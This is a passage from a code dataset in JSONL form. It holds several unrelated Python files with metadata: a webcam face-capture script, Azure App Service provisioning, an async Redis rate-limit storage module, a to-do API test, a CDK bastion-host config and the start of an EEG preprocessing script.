"curl2swift.layers.presentation.content_presenter.ViewModel", "line_number": 173, "usage_type": "name"}]} +{"seq_id": "6924354408", "text": "import cv2\nimport numpy as np\nfrom os 
import makedirs\nfrom os.path import isdir\n\n# Save faces\nface_dirs = 'faces/'\nface_classifier = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n\ndef face_extractor(img): # Face detection \n    gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n    faces = face_classifier.detectMultiScale(gray,1.3,5)\n    if len(faces) == 0:\n        return None\n    for(x,y,w,h) in faces:\n        cropped_face = img[y:y+h, x:x+w]\n    return cropped_face\n\ndef take_pictures(name): # Directory where the faces are saved\n    if not isdir(face_dirs+name):\n        makedirs(face_dirs+name)\n    \n    cap = cv2.VideoCapture(0)\n    count = 0\n\n    # Take pictures\n    while True:\n        ret, frame = cap.read()\n        if face_extractor(frame) is not None: \n            count+=1\n            face = cv2.resize(face_extractor(frame),(200,200))\n            face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)\n\n            file_name_path = face_dirs + name + '/user'+str(count)+'.jpg'\n            cv2.imwrite(file_name_path,face)\n\n            cv2.putText(face,str(count),(50,50),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n            cv2.imshow('Face Cropper',face)\n        else:\n            print(\"Face not found.\")\n            pass\n        if cv2.waitKey(1)==13 or count==300: # stop after 300 shots\n            break\n\n    cap.release()\n    cv2.destroyAllWindows()\n    print('Collecting done!!!')\n\n\nif __name__ == \"__main__\":\n    take_pictures('DU')\n    ", "repo_name": "Xproject-Team5/ONOON_FINAL", "sub_path": "xproject/ml/face recog 1.py", "file_name": "face recog 1.py", "file_ext": "py", "file_size_in_byte": 1483, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "31656429694", "text": "import json\nimport os\nimport subprocess\nfrom infra.keyvault.keyvault import KeyVault\n\nclass AppService:\n    def __init__(self, web_client, resource_group, subscription_id):\n        self.web_client = web_client\n        self.resource_group = resource_group\n        self.subscription_id = subscription_id\n\n    def __execute_command(self, command):\n        process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n        response = process.communicate()\n        json_message = response[0].decode()\n        return (process.returncode, '' if json_message == '' else json.loads(json_message))\n\n    def provision(self, config_name, location, environment):\n        # Load microservices config.json\n        current_dir = os.path.dirname(__file__)\n        config_file = os.path.join(\n            current_dir, \"config\", config_name, \"app_service\", \"config.json\")\n        microservices_config_file = open(config_file)\n        microservices_config = 
json.load(microservices_config_file)\n print(f\"Loaded microservices config file {config_file}\")\n\n for microservice in microservices_config:\n microservice_name = microservice + \"-\" + environment\n\n # Fetch the AppServicePlan Id\n app_service_plan = self.web_client.app_service_plans.get(\n self.resource_group,\n microservices_config[microservice]['app-service-plan'] + \"-\" + environment \n )\n\n # Assigning the subnet equivalent of App service plan. Can include this in the config\n if microservices_config[microservice]['vnet-enabled'] is False:\n subnet = None\n else:\n vnet = f\"/subscriptions/{self.subscription_id}/resourceGroups/{self.resource_group}/providers/Microsoft.Network/virtualNetworks/TDEI-\" + environment + \"-VNET/subnets/\"\n subnet = vnet + microservices_config[microservice]['app-service-plan'] + \"-subnet\"\n\n if microservices_config[microservice]['publicNetworkAccess'] is None:\n public_access = None\n else:\n public_access = microservices_config[microservice]['publicNetworkAccess']\n\n print(f\"Provisioning App Service: {microservice_name}\")\n web_app_result = self.web_client.web_apps.begin_create_or_update(\n self.resource_group,\n microservice_name,\n {\n \"location\": location,\n \"server_farm_id\": app_service_plan.id,\n \"vnetRouteAllEnabled\": microservices_config[microservice]['vnet-enabled'],\n \"virtualNetworkSubnetId\": subnet,\n \"publicNetworkAccess\": public_access,\n \"site_config\": {\n \"linux_fx_version\": microservices_config[microservice]['linux-fx-version'],\n \"always_on\": microservices_config[microservice]['always-on']\n },\n }\n ).result()\n print(f\"Completed - {web_app_result.default_host_name}. Configuring Health Check for it\")\n print(f\"Completed -Id is {web_app_result.id}.\")\n KeyVault.setSecret(microservice + '-hostname', web_app_result.default_host_name)\n site_config = self.web_client.web_apps.get_configuration(self.resource_group, microservice_name)\n\n # Not all app services have health check. Example: API-gateway-spec\n if \"health-check-path\" in microservices_config[microservice]:\n site_config.health_check_path = microservices_config[microservice]['health-check-path']\n site_config.health_check_http_status = microservices_config[microservice]['health-check-http-status']\n\n # Keycloak service requires a startup command line\n if \"appCommandLine\" in microservices_config[microservice]:\n site_config.app_command_line = microservices_config[microservice]['appCommandLine']\n self.web_client.web_apps.update_configuration(self.resource_group, microservice_name, site_config)\n print(\"Completed Configuring Health Check\")\n\n # Cors Settings. 
If cors needs an array, loop through the array\n if \"cors-settings\" in microservices_config[microservice]:\n KeyVault.substitue_expression(microservices_config[microservice]['cors-settings'])\n command = 'az webapp cors add --resource-group ' + self.resource_group + ' --name ' + microservice_name + ' --allowed-origins ' + microservices_config[microservice]['cors-settings']['allowed-origins']\n return_code, result = self.__execute_command(command)\n if return_code == 0:\n print(result)\n else:\n print('Failed to create CORS')\n\n if microservices_config[microservice]['vnet-enabled'] is True:\n # Provisioning Private Endpoint Connection\n pe_command = 'az network private-endpoint create --resource-group ' + self.resource_group + ' --name ' + microservice_name + '-pe --vnet-name ' + 'TDEI-' + environment + '-VNET --subnet TDEI-pe-subnet --private-connection-resource-id ' + web_app_result.id + ' --connection-name ' + microservice_name + 'plsc --group-id sites'\n print(pe_command)\n return_code, result = self.__execute_command(pe_command)\n if return_code == 0:\n print(result)\n else:\n print('Failed to create private endpoint')\n\n\n", "repo_name": "TaskarCenterAtUW/TDEI-IaC", "sub_path": "infra/app_services/app_service.py", "file_name": "app_service.py", "file_ext": "py", "file_size_in_byte": 5554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "subprocess.Popen", "line_number": 13, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "infra.keyvault.keyvault.KeyVault.setSecret", "line_number": 66, "usage_type": "call"}, {"api_name": "infra.keyvault.keyvault.KeyVault", "line_number": 66, "usage_type": "name"}, {"api_name": "infra.keyvault.keyvault.KeyVault.substitue_expression", "line_number": 82, "usage_type": "call"}, {"api_name": "infra.keyvault.keyvault.KeyVault", "line_number": 82, "usage_type": "name"}]} +{"seq_id": "75330558563", "text": "import time\nimport urllib\nfrom typing import TYPE_CHECKING, cast\n\nfrom deprecated.sphinx import versionadded\nfrom packaging.version import Version\n\nfrom limits.aio.storage.base import MovingWindowSupport, Storage\nfrom limits.errors import ConfigurationError\nfrom limits.typing import AsyncRedisClient, Dict, Optional, Tuple, Union\nfrom limits.util import get_package_data\n\nif TYPE_CHECKING:\n import coredis\n import coredis.commands\n\n\nclass RedisInteractor:\n RES_DIR = \"resources/redis/lua_scripts\"\n\n SCRIPT_MOVING_WINDOW = get_package_data(f\"{RES_DIR}/moving_window.lua\")\n SCRIPT_ACQUIRE_MOVING_WINDOW = get_package_data(\n f\"{RES_DIR}/acquire_moving_window.lua\"\n )\n SCRIPT_CLEAR_KEYS = get_package_data(f\"{RES_DIR}/clear_keys.lua\")\n SCRIPT_INCR_EXPIRE = get_package_data(f\"{RES_DIR}/incr_expire.lua\")\n\n lua_moving_window: \"coredis.commands.Script[bytes]\"\n lua_acquire_window: \"coredis.commands.Script[bytes]\"\n lua_clear_keys: \"coredis.commands.Script[bytes]\"\n lua_incr_expire: \"coredis.commands.Script[bytes]\"\n\n async def _incr(\n self,\n key: str,\n 
expiry: int,\n connection: AsyncRedisClient,\n elastic_expiry: bool = False,\n amount: int = 1,\n ) -> int:\n \"\"\"\n increments the counter for a given rate limit key\n\n :param connection: Redis connection\n :param key: the key to increment\n :param expiry: amount in seconds for the key to expire in\n :param amount: the number to increment by\n \"\"\"\n value = await connection.incrby(key, amount)\n\n if elastic_expiry or value == amount:\n await connection.expire(key, expiry)\n\n return value\n\n async def _get(self, key: str, connection: AsyncRedisClient) -> int:\n \"\"\"\n :param connection: Redis connection\n :param key: the key to get the counter value for\n \"\"\"\n\n return int(await connection.get(key) or 0)\n\n async def _clear(self, key: str, connection: AsyncRedisClient) -> None:\n \"\"\"\n :param key: the key to clear rate limits for\n :param connection: Redis connection\n \"\"\"\n await connection.delete([key])\n\n async def get_moving_window(\n self, key: str, limit: int, expiry: int\n ) -> Tuple[int, int]:\n \"\"\"\n returns the starting point and the number of entries in the moving\n window\n\n :param key: rate limit key\n :param expiry: expiry of entry\n :return: (start of window, number of acquired entries)\n \"\"\"\n timestamp = int(time.time())\n window = await self.lua_moving_window.execute(\n [key], [int(timestamp - expiry), limit]\n )\n if window:\n return tuple(window) # type: ignore\n return timestamp, 0\n\n async def _acquire_entry(\n self,\n key: str,\n limit: int,\n expiry: int,\n connection: AsyncRedisClient,\n amount: int = 1,\n ) -> bool:\n \"\"\"\n :param key: rate limit key to acquire an entry in\n :param limit: amount of entries allowed\n :param expiry: expiry of the entry\n :param connection: Redis connection\n \"\"\"\n timestamp = time.time()\n acquired = await self.lua_acquire_window.execute(\n [key], [timestamp, limit, expiry, amount]\n )\n\n return bool(acquired)\n\n async def _get_expiry(self, key: str, connection: AsyncRedisClient) -> int:\n \"\"\"\n :param key: the key to get the expiry for\n :param connection: Redis connection\n \"\"\"\n\n return int(max(await connection.ttl(key), 0) + time.time())\n\n async def _check(self, connection: AsyncRedisClient) -> bool:\n \"\"\"\n check if storage is healthy\n\n :param connection: Redis connection\n \"\"\"\n try:\n await connection.ping()\n\n return True\n except: # noqa\n return False\n\n\n@versionadded(version=\"2.1\")\nclass RedisStorage(RedisInteractor, Storage, MovingWindowSupport):\n \"\"\"\n Rate limit storage with redis as backend.\n\n Depends on :pypi:`coredis`\n \"\"\"\n\n STORAGE_SCHEME = [\"async+redis\", \"async+rediss\", \"async+redis+unix\"]\n \"\"\"\n The storage schemes for redis to be used in an async context\n \"\"\"\n DEPENDENCIES = {\"coredis\": Version(\"3.4.0\")}\n\n def __init__(\n self,\n uri: str,\n connection_pool: Optional[\"coredis.ConnectionPool\"] = None,\n **options: Union[float, str, bool],\n ) -> None:\n \"\"\"\n :param uri: uri of the form:\n\n - ``async+redis://[:password]@host:port``\n - ``async+redis://[:password]@host:port/db``\n - ``async+rediss://[:password]@host:port``\n - ``async+unix:///path/to/sock`` etc...\n\n This uri is passed directly to :meth:`coredis.Redis.from_url` with\n the initial ``async`` removed, except for the case of ``async+redis+unix``\n where it is replaced with ``unix``.\n :param connection_pool: if provided, the redis client is initialized with\n the connection pool and any other params passed as :paramref:`options`\n :param options: all 
remaining keyword arguments are passed\n directly to the constructor of :class:`coredis.Redis`\n :raise ConfigurationError: when the redis library is not available\n \"\"\"\n uri = uri.replace(\"async+redis\", \"redis\", 1)\n uri = uri.replace(\"redis+unix\", \"unix\")\n\n super().__init__(uri, **options)\n\n self.dependency = self.dependencies[\"coredis\"].module\n\n if connection_pool:\n self.storage = self.dependency.Redis(\n connection_pool=connection_pool, **options\n )\n else:\n self.storage = self.dependency.Redis.from_url(uri, **options)\n\n self.initialize_storage(uri)\n\n def initialize_storage(self, _uri: str) -> None:\n # all these methods are coroutines, so must be called with await\n self.lua_moving_window = self.storage.register_script(self.SCRIPT_MOVING_WINDOW)\n self.lua_acquire_window = self.storage.register_script(\n self.SCRIPT_ACQUIRE_MOVING_WINDOW\n )\n self.lua_clear_keys = self.storage.register_script(self.SCRIPT_CLEAR_KEYS)\n self.lua_incr_expire = self.storage.register_script(\n RedisStorage.SCRIPT_INCR_EXPIRE\n )\n\n async def incr(\n self, key: str, expiry: int, elastic_expiry: bool = False, amount: int = 1\n ) -> int:\n \"\"\"\n increments the counter for a given rate limit key\n\n :param key: the key to increment\n :param expiry: amount in seconds for the key to expire in\n :param amount: the number to increment by\n \"\"\"\n\n if elastic_expiry:\n return await super()._incr(\n key, expiry, self.storage, elastic_expiry, amount\n )\n else:\n return cast(\n int, await self.lua_incr_expire.execute([key], [expiry, amount])\n )\n\n async def get(self, key: str) -> int:\n \"\"\"\n :param key: the key to get the counter value for\n \"\"\"\n\n return await super()._get(key, self.storage)\n\n async def clear(self, key: str) -> None:\n \"\"\"\n :param key: the key to clear rate limits for\n \"\"\"\n\n return await super()._clear(key, self.storage)\n\n async def acquire_entry(\n self, key: str, limit: int, expiry: int, amount: int = 1\n ) -> bool:\n \"\"\"\n :param key: rate limit key to acquire an entry in\n :param limit: amount of entries allowed\n :param expiry: expiry of the entry\n :param amount: the number of entries to acquire\n \"\"\"\n\n return await super()._acquire_entry(key, limit, expiry, self.storage, amount)\n\n async def get_expiry(self, key: str) -> int:\n \"\"\"\n :param key: the key to get the expiry for\n \"\"\"\n\n return await super()._get_expiry(key, self.storage)\n\n async def check(self) -> bool:\n \"\"\"\n Check if storage is healthy by calling :meth:`coredis.Redis.ping`\n \"\"\"\n\n return await super()._check(self.storage)\n\n async def reset(self) -> Optional[int]:\n \"\"\"\n This function calls a Lua Script to delete keys prefixed with 'LIMITER'\n in block of 5000.\n\n .. warning:: This operation was designed to be fast, but was not tested\n on a large production based system. 
Be careful with its usage as it\n could be slow on very large data sets.\n \"\"\"\n\n return cast(int, await self.lua_clear_keys.execute([\"LIMITER*\"]))\n\n\n@versionadded(version=\"2.1\")\nclass RedisClusterStorage(RedisStorage):\n \"\"\"\n Rate limit storage with redis cluster as backend\n\n Depends on :pypi:`coredis`\n \"\"\"\n\n STORAGE_SCHEME = [\"async+redis+cluster\"]\n \"\"\"\n The storage schemes for redis cluster to be used in an async context\n \"\"\"\n\n DEFAULT_OPTIONS: Dict[str, Union[float, str, bool]] = {\n \"max_connections\": 1000,\n }\n \"Default options passed to :class:`coredis.RedisCluster`\"\n\n def __init__(self, uri: str, **options: Union[float, str, bool]) -> None:\n \"\"\"\n :param uri: url of the form\n ``async+redis+cluster://[:password]@host:port,host:port``\n :param options: all remaining keyword arguments are passed\n directly to the constructor of :class:`coredis.RedisCluster`\n :raise ConfigurationError: when the coredis library is not\n available or if the redis host cannot be pinged.\n \"\"\"\n parsed = urllib.parse.urlparse(uri)\n parsed_auth: Dict[str, Union[float, str, bool]] = {}\n\n if parsed.username:\n parsed_auth[\"username\"] = parsed.username\n if parsed.password:\n parsed_auth[\"password\"] = parsed.password\n\n sep = parsed.netloc.find(\"@\") + 1\n cluster_hosts = []\n\n for loc in parsed.netloc[sep:].split(\",\"):\n host, port = loc.split(\":\")\n cluster_hosts.append({\"host\": host, \"port\": int(port)})\n\n super(RedisStorage, self).__init__(uri, **options)\n\n self.dependency = self.dependencies[\"coredis\"].module\n\n self.storage: \"coredis.RedisCluster[str]\" = self.dependency.RedisCluster(\n startup_nodes=cluster_hosts,\n **{**self.DEFAULT_OPTIONS, **parsed_auth, **options},\n )\n self.initialize_storage(uri)\n\n async def reset(self) -> Optional[int]:\n \"\"\"\n Redis Clusters are sharded and deleting across shards\n can't be done atomically. Because of this, this reset loops over all\n keys that are prefixed with 'LIMITER' and calls delete on them, one at\n a time.\n\n .. 
warning:: This operation was not tested with extremely large data sets.\n On a large production based system, care should be taken with its\n usage as it could be slow on very large data sets\n \"\"\"\n\n keys = await self.storage.keys(\"LIMITER*\")\n count = 0\n for key in keys:\n count += await self.storage.delete([key])\n return count\n\n\n@versionadded(version=\"2.1\")\nclass RedisSentinelStorage(RedisStorage):\n \"\"\"\n Rate limit storage with redis sentinel as backend\n\n Depends on :pypi:`coredis`\n \"\"\"\n\n STORAGE_SCHEME = [\"async+redis+sentinel\"]\n \"\"\"The storage scheme for redis accessed via a redis sentinel installation\"\"\"\n\n DEPENDENCIES = {\"coredis.sentinel\": Version(\"3.4.0\")}\n\n def __init__(\n self,\n uri: str,\n service_name: Optional[str] = None,\n use_replicas: bool = True,\n sentinel_kwargs: Optional[Dict[str, Union[float, str, bool]]] = None,\n **options: Union[float, str, bool],\n ):\n \"\"\"\n :param uri: url of the form\n ``async+redis+sentinel://host:port,host:port/service_name``\n :param service_name, optional: sentinel service name\n (if not provided in `uri`)\n :param use_replicas: Whether to use replicas for read only operations\n :param sentinel_kwargs, optional: kwargs to pass as\n ``sentinel_kwargs`` to :class:`coredis.sentinel.Sentinel`\n :param options: all remaining keyword arguments are passed\n directly to the constructor of :class:`coredis.sentinel.Sentinel`\n :raise ConfigurationError: when the coredis library is not available\n or if the redis primary host cannot be pinged.\n \"\"\"\n\n parsed = urllib.parse.urlparse(uri)\n sentinel_configuration = []\n connection_options = options.copy()\n sentinel_options = sentinel_kwargs.copy() if sentinel_kwargs else {}\n parsed_auth: Dict[str, Union[float, str, bool]] = {}\n\n if parsed.username:\n parsed_auth[\"username\"] = parsed.username\n\n if parsed.password:\n parsed_auth[\"password\"] = parsed.password\n\n sep = parsed.netloc.find(\"@\") + 1\n\n for loc in parsed.netloc[sep:].split(\",\"):\n host, port = loc.split(\":\")\n sentinel_configuration.append((host, int(port)))\n self.service_name = (\n parsed.path.replace(\"/\", \"\") if parsed.path else service_name\n )\n\n if self.service_name is None:\n raise ConfigurationError(\"'service_name' not provided\")\n\n super(RedisStorage, self).__init__()\n\n self.dependency = self.dependencies[\"coredis.sentinel\"].module\n\n self.sentinel = self.dependency.Sentinel(\n sentinel_configuration,\n sentinel_kwargs={**parsed_auth, **sentinel_options},\n **{**parsed_auth, **connection_options},\n )\n self.storage = self.sentinel.primary_for(self.service_name)\n self.storage_replica = self.sentinel.replica_for(self.service_name)\n self.use_replicas = use_replicas\n self.initialize_storage(uri)\n\n async def get(self, key: str) -> int:\n \"\"\"\n :param key: the key to get the counter value for\n \"\"\"\n\n return await super()._get(\n key, self.storage_replica if self.use_replicas else self.storage\n )\n\n async def get_expiry(self, key: str) -> int:\n \"\"\"\n :param key: the key to get the expiry for\n \"\"\"\n\n return await super()._get_expiry(\n key, self.storage_replica if self.use_replicas else self.storage\n )\n\n async def check(self) -> bool:\n \"\"\"\n Check if storage is healthy by calling :meth:`coredis.Redis.ping`\n on the replica.\n \"\"\"\n\n return await super()._check(\n self.storage_replica if self.use_replicas else self.storage\n )\n", "repo_name": "alisaifee/limits", "sub_path": "limits/aio/storage/redis.py", "file_name": 
"redis.py", "file_ext": "py", "file_size_in_byte": 14630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 293, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 13, "usage_type": "name"}, {"api_name": "limits.util.get_package_data", "line_number": 21, "usage_type": "call"}, {"api_name": "limits.util.get_package_data", "line_number": 22, "usage_type": "call"}, {"api_name": "limits.util.get_package_data", "line_number": 25, "usage_type": "call"}, {"api_name": "limits.util.get_package_data", "line_number": 26, "usage_type": "call"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 37, "usage_type": "name"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 56, "usage_type": "name"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 64, "usage_type": "name"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "limits.typing.Tuple", "line_number": 73, "usage_type": "name"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 95, "usage_type": "name"}, {"api_name": "time.time", "line_number": 104, "usage_type": "call"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 111, "usage_type": "name"}, {"api_name": "time.time", "line_number": 117, "usage_type": "call"}, {"api_name": "limits.typing.AsyncRedisClient", "line_number": 119, "usage_type": "name"}, {"api_name": "limits.aio.storage.base.Storage", "line_number": 134, "usage_type": "name"}, {"api_name": "limits.aio.storage.base.MovingWindowSupport", "line_number": 134, "usage_type": "name"}, {"api_name": "packaging.version.Version", "line_number": 145, "usage_type": "call"}, {"api_name": "limits.typing.Optional", "line_number": 150, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 213, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 267, "usage_type": "call"}, {"api_name": "limits.typing.Optional", "line_number": 257, "usage_type": "name"}, {"api_name": "deprecated.sphinx.versionadded", "line_number": 133, "usage_type": "call"}, {"api_name": "limits.typing.Dict", "line_number": 283, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 283, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 288, "usage_type": "name"}, {"api_name": "urllib.parse.urlparse", "line_number": 297, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 297, "usage_type": "attribute"}, {"api_name": "limits.typing.Dict", "line_number": 298, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 298, "usage_type": "name"}, {"api_name": "limits.typing.Optional", "line_number": 322, "usage_type": "name"}, {"api_name": "deprecated.sphinx.versionadded", "line_number": 270, "usage_type": "call"}, {"api_name": "packaging.version.Version", "line_number": 352, "usage_type": "call"}, {"api_name": "limits.typing.Optional", "line_number": 357, "usage_type": "name"}, {"api_name": "limits.typing.Optional", "line_number": 359, "usage_type": "name"}, {"api_name": "limits.typing.Dict", "line_number": 359, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 359, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 360, "usage_type": "name"}, {"api_name": "urllib.parse.urlparse", "line_number": 376, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 376, "usage_type": "attribute"}, 
{"api_name": "limits.typing.Dict", "line_number": 380, "usage_type": "name"}, {"api_name": "limits.typing.Union", "line_number": 380, "usage_type": "name"}, {"api_name": "limits.errors.ConfigurationError", "line_number": 398, "usage_type": "call"}, {"api_name": "deprecated.sphinx.versionadded", "line_number": 341, "usage_type": "call"}]} +{"seq_id": "37098420748", "text": "from unittest import TestCase, main\nimport requests\n\n\nclass TaskListTest(TestCase):\n def test_get_returns_json_200(self):\n r = requests.get('http://localhost:5000/todo/api/v1.0/tasks')\n self.assertEqual(r.headers['Content-Type'], 'application/json')\n self.assertEqual(r.status_code, requests.codes.ok)\n\n def test_create_returns_json_201(self):\n r = requests.post('http://localhost:5000/todo/api/v1.0/tasks', data={'content': 'new task'})\n creation_date = r.json()['creation_date']\n id_ = r.json()['id']\n\n self.assertEqual(r.status_code, requests.codes.created)\n self.assertEqual(r.json(), {'content': 'new task',\n 'completed': False,\n 'id': id_,\n 'creation_date': creation_date,\n 'uri': '/todo/api/v1.0/task/' + str(id_)})\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "lukasz-f/To-Do-List", "sub_path": "todo_list_app/tests/task_list_test.py", "file_name": "task_list_test.py", "file_ext": "py", "file_size_in_byte": 965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 5, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 9, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 16, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "4330591937", "text": "from getpass import getuser\nfrom ipaddress import IPv4Interface\nfrom typing import List, Optional\n\nimport aws_cdk\nfrom pydantic import BaseSettings, Field, constr, DirectoryPath, FilePath\n\n\nclass Deployment(BaseSettings):\n project: Optional[constr(regex=r\"^[a-z0-9_\\-]+\")]\n client: Optional[str]\n owner: str = Field(\n description=\" \".join(\n [\n \"Name of primary contact for Cloudformation Stack.\",\n \"Used to tag generated resources\",\n \"Defaults to current username.\",\n ]\n ),\n default_factory=getuser,\n )\n stage: str = Field(\n description=\" \".join(\n [\n \"Stage of deployment (e.g. 
'dev', 'prod').\",\n \"Used as suffix for stack name.\",\n \"Defaults to current username.\",\n ]\n ),\n default_factory=getuser,\n )\n\n aws_account: str = Field(\n description=\"AWS account used for deployment\",\n env=\"CDK_DEFAULT_ACCOUNT\",\n )\n aws_region: str = Field(\n default=\"us-west-2\",\n description=\"AWS region used for deployment\",\n env=\"CDK_DEFAULT_REGION\",\n )\n\n db_instance_identifier: str = Field(\n description=\"The instance identifier of database to which we want to connect.\"\n )\n\n ipv4_allowlist: List[IPv4Interface] = Field(\n default_factory=lambda: [],\n description=\"IPv4 CIDRs that are allowed SSH access to bastion host.\",\n )\n\n userdata_file: FilePath = Field(default=\"./userdata.yaml\")\n\n ssh_port: int = 22\n\n @property\n def stack_name(self) -> str:\n return f\"{self.project}-{self.stage}-db-bastion\"\n\n @property\n def env(self) -> aws_cdk.Environment:\n return aws_cdk.Environment(\n account=self.aws_account,\n region=self.aws_region,\n )\n", "repo_name": "developmentseed/cdk-rds-bastion-host", "sub_path": "cdk/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pydantic.BaseSettings", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}, {"api_name": "pydantic.constr", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 11, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 12, "usage_type": "call"}, {"api_name": "getpass.getuser", "line_number": 20, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 22, "usage_type": "call"}, {"api_name": "getpass.getuser", "line_number": 30, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 33, "usage_type": "call"}, {"api_name": "pydantic.Field", "line_number": 37, "usage_type": "call"}, {"api_name": "pydantic.Field", "line_number": 43, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 47, "usage_type": "name"}, {"api_name": "ipaddress.IPv4Interface", "line_number": 47, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 47, "usage_type": "call"}, {"api_name": "pydantic.FilePath", "line_number": 52, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 52, "usage_type": "call"}, {"api_name": "aws_cdk.Environment", "line_number": 62, "usage_type": "call"}, {"api_name": "aws_cdk.Environment", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "4310169374", "text": "import numpy as np\nimport h5py\nfrom data.data_utils import *\nimport os\n\n# set seed\nSEED = 123\nnp.random.seed(SEED)\n\n# Define some constants here\noutput_dir = '/share/pi/rubin/siyitang/eeg/input/cv_full'\ntxt_dir = 'data'\nFs = [12, 24, 48, 64, 96]\nWs = [1, 2, 4, 8, 16]\nOs = [0.25, 0.50, 0.75]\nDENSE_PARAMS = []\nfor f in Fs:\n for w in Ws:\n for o in Os:\n DENSE_PARAMS.append([f, w, o])\nTRAIN_INCREASES = len(Fs) * len(Ws) * len(Os)\nprint('Train set increases by {}'.format(TRAIN_INCREASES))\ntest_w = 2\ntest_o = 0.25\nNUM_FOLDS = 5\nSEIZURE_FILE = \"data/seizure_files.txt\"\n\ndef main(num_folds):\n \"\"\"\n Perform feature extraction before-hand.\n Increase the sample size by different combinations of sampling freq, window size & overlap.\n \"\"\"\n for fold_idx in range(num_folds):\n print('Preprocessing for fold{}...'.format(fold_idx))\n train_write_txt = 
os.path.join(txt_dir,'fold' + str(fold_idx) + '_trainSet_seizure_files.txt')\n test_write_txt = os.path.join(txt_dir, 'fold' + str(fold_idx) + '_testSet_seizure_files.txt')\n \n # Split into train/test, stratified K fold\n file_tuples = parseTxtFiles(SEIZURE_FILE, num_folds=num_folds, fold_idx=fold_idx, cross_val=True)\n train_file_tuples = file_tuples[0]\n test_file_tuples = file_tuples[1]\n \n # Write into a new text file for train set only\n f_train = open(train_write_txt, 'w+')\n for name, sz_class, count in train_file_tuples:\n f_train.write(\"%s,%s,%s\\n\" % (name, sz_class, count))\n f_train.close()\n \n f_test = open(test_write_txt, 'w+')\n for name, sz_class, count in test_file_tuples:\n f_test.write(\"%s,%s,%s\\n\" % (name, sz_class, count))\n f_test.close()\n\n ##### TRAIN SET #####\n features = {} \n for idx in range(len(train_file_tuples)):\n curr_file_name, seizure_class, seizure_idx = train_file_tuples[idx]\n # read file\n f = pyedflib.EdfReader(curr_file_name)\n \n ordered_channels = getOrderedChannels(curr_file_name, False, f.getSignalLabels())\n \n signals = getEDFsignals(f)\n \n frequencies = getSamplingFreq(f, ordered_channels)\n freq = 